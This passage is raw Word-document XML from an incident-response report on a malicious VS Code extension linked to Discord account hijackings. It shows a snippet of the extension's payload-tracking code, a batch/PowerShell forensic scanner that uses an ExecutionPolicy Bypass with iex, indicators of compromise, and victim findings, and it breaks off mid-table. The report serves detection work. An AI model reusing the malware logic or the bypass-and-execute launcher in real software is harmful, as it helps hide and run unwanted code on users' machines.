          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>state.vscdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9936"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9936"/>
            <w:shd w:fill="F1F5F9"/>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0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>var Adn = "alpme.partnerSoftware.lastSha256";</w:t>
              <w:br/>
              <w:t>var eIt = "alpme.partnerSoftware.lastPath";</w:t>
              <w:br/>
              <w:br/>
              <w:t>await context.globalState.update(Adn, serverSha256 || localSha256);</w:t>
              <w:br/>
              <w:t>await context.globalState.update(eIt, payloadPath);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>While this does not provide system-level boot persistence, it ensures persistent tracking within the IDE profile and provides a valuable forensic artifact for detection.</w:t>
      </w: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6. Tool Engineering: The Forensic Auditor (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>Check-Alpme-Final.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>The Incident Response Challenge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected developers on Discord were non-technical users unable to configure Python, Node, or SQLite command-line tools. Additionally, when VS Code is open, Windows enforces an exclusive file lock on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>state.vscdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>, causing basic file-read scripts to throw access violation errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>The Engineering Solution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A zero-dependency hybrid batch/PowerShell polyglot script was authored to resolve these constraints:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lock Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Opens </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>state.vscdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[System.IO.FileShare]::ReadWrite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and copies binary contents into a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MemoryStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for regex pattern parsing without disturbing active VS Code processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Process Memory Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Inspects running processes matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%TEMP%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executable patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Disk Triage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Recursively sweeps </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%TEMP%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for directories matching the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Edn()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mathematical naming regex (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pkg-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>svchost-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>winhlp-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>wuauclt-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9936"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9936"/>
            <w:shd w:fill="0F172A"/>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E2E8F0"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;# :</w:t>
              <w:br/>
              <w:t>@echo off</w:t>
              <w:br/>
              <w:t>title Alpme Forensic Auditor v2.2 (Hardened Enterprise)</w:t>
              <w:br/>
              <w:t>color 0B</w:t>
              <w:br/>
              <w:t>powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((Get-Content -Raw '%~f0') -replace '(?s)^&lt;#.*?#&gt;\r?\n','')"</w:t>
              <w:br/>
              <w:t>pause</w:t>
              <w:br/>
              <w:t>exit /b</w:t>
              <w:br/>
              <w:t>#&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>Clear-Host</w:t>
              <w:br/>
              <w:t>Write-Host "========================================================" -ForegroundColor Cyan</w:t>
              <w:br/>
              <w:t>Write-Host "       ALPME EXTENSION FORENSIC AUDITOR v2.2            " -ForegroundColor Cyan</w:t>
              <w:br/>
              <w:t>Write-Host "========================================================" -ForegroundColor Cyan</w:t>
              <w:br/>
              <w:br/>
              <w:t>$dbPaths = @(</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "$env:APPDATA\Code\User\globalStorage\state.vscdb",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "$env:APPDATA\Code - Insiders\User\globalStorage\state.vscdb",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "$env:APPDATA\VSCodium\User\globalStorage\state.vscdb"</w:t>
              <w:br/>
              <w:t>)</w:t>
              <w:br/>
              <w:br/>
              <w:t>$discoveredPayloads = [System.Collections.Generic.HashSet[string]]::new()</w:t>
              <w:br/>
              <w:t>$discoveredHashes   = [System.Collections.Generic.HashSet[string]]::new()</w:t>
              <w:br/>
              <w:br/>
              <w:t># 1. Multi-Record Database Scanner (Anchored to Alpme Context)</w:t>
              <w:br/>
              <w:t>Write-Host "[*] Auditing VS Code SQLite Databases..." -ForegroundColor Gray</w:t>
              <w:br/>
              <w:t>foreach ($db in $dbPaths) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (Test-Path $db) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $fs = [System.IO.File]::Open($db, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $ms = New-Object System.IO.MemoryStream</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $fs.CopyTo($ms)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $fs.Close()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $text = [System.Text.Encoding]::ASCII.GetString($ms.ToArray())</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">            if ($text -match "alpme") {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                # Extract historical payload paths</w:t>
              <w:br/>
              <w:t xml:space="preserve">                $pathMatches = [regex]::Matches($text, '([A-Za-z]:\\[^"''\r\n\x00]+\\[0-9a-zA-Z_-]+\.exe)')</w:t>
              <w:br/>
              <w:t xml:space="preserve">                foreach ($m in $pathMatches) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    $val = $m.Groups[1].Value.Trim()</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    if ($val -like "*\Temp\*" -or $val -like "*\pkg-*" -or $val -like "*\winhlp-*") {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        $discoveredPayloads.Add($val) | Out-Null</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">                }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">                # Extract SHA-256 hash tied to partnerSoftware key</w:t>
              <w:br/>
              <w:t xml:space="preserve">                $hashMatches = [regex]::Matches($text, 'partnerSoftware[^\da-fA-F]{1,100}([a-fA-F0-9]{64})')</w:t>
              <w:br/>
              <w:t xml:space="preserve">                foreach ($h in $hashMatches) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    $discoveredHashes.Add($h.Groups[1].Value) | Out-Null</w:t>
              <w:br/>
              <w:t xml:space="preserve">                }</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        } catch {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Write-Host "[-] Could not access $db" -ForegroundColor DarkGray</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>if ($discoveredPayloads.Count -gt 0 -or $discoveredHashes.Count -gt 0) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Write-Host "`n[!] INFECTION EVIDENCE FOUND IN VS CODE DATABASE!" -ForegroundColor Red</w:t>
              <w:br/>
              <w:t xml:space="preserve">    foreach ($h in $discoveredHashes) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Write-Host "  [-] Executed Malware SHA-256 : $h" -ForegroundColor Yellow</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Write-Host "  [-] VirusTotal Threat Link   : https://www.virustotal.com/gui/file/$h" -ForegroundColor DarkCyan</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    foreach ($p in $discoveredPayloads) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        Write-Host "  [-] Dropped Payload Location : $p" -ForegroundColor Yellow</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (Test-Path $p) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            Write-Host "  [!] WARNING: Dropped binary is STILL SITTING on disk!" -ForegroundColor Red</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>} else {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    Write-Host "[+] VS Code databases clean." -ForegroundColor Green</w:t>
              <w:br/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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7. Live Victim Remediation &amp; Threat Confirmation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Incident Response Findings (Victim Case #1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The auditor was deployed on an affected community member's system. The scan successfully extracted:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Recorded SHA-256 Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ed5f166035a2b3332bc349043b8d1d53a26da5551c06bc47d1bda8e16a7ac1dc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Dropped Physical Binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Located on disk at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>C:\Users\pc\AppData\Local\Temp\pkg-4a3cded7\25si.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Forensic Significance of the Sample</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Unindexed Polymorphic Build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: At the time of extraction, the SHA-256 hash had zero public search engine indexing, indicating a newly compiled or packed build designed to evade static hash signatures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Naming Validation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: The folder structure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>pkg-4a3cded7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and executable name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>25si.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> conformed exactly to the reverse-engineered </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>d4e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Edn()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> generator routine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="0" w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Correlation with Community Hijackings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>: The victim was among the users reporting unauthorized Discord account access shortly after executing the extension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="991B1B"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Multi-Vendor VirusTotal Classifications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The isolated binary (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>25si.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>) was analyzed across commercial endpoint detection engines:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3312"/>
        <w:gridCol w:w="3312"/>
        <w:gridCol w:w="3312"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="0F172A"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="0F172A"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1E293B"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="0F172A"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1E293B"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Antivirus Vendor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:shd w:fill="0F172A"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="0F172A"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1E293B"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="0F172A"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1E293B"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Detection Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
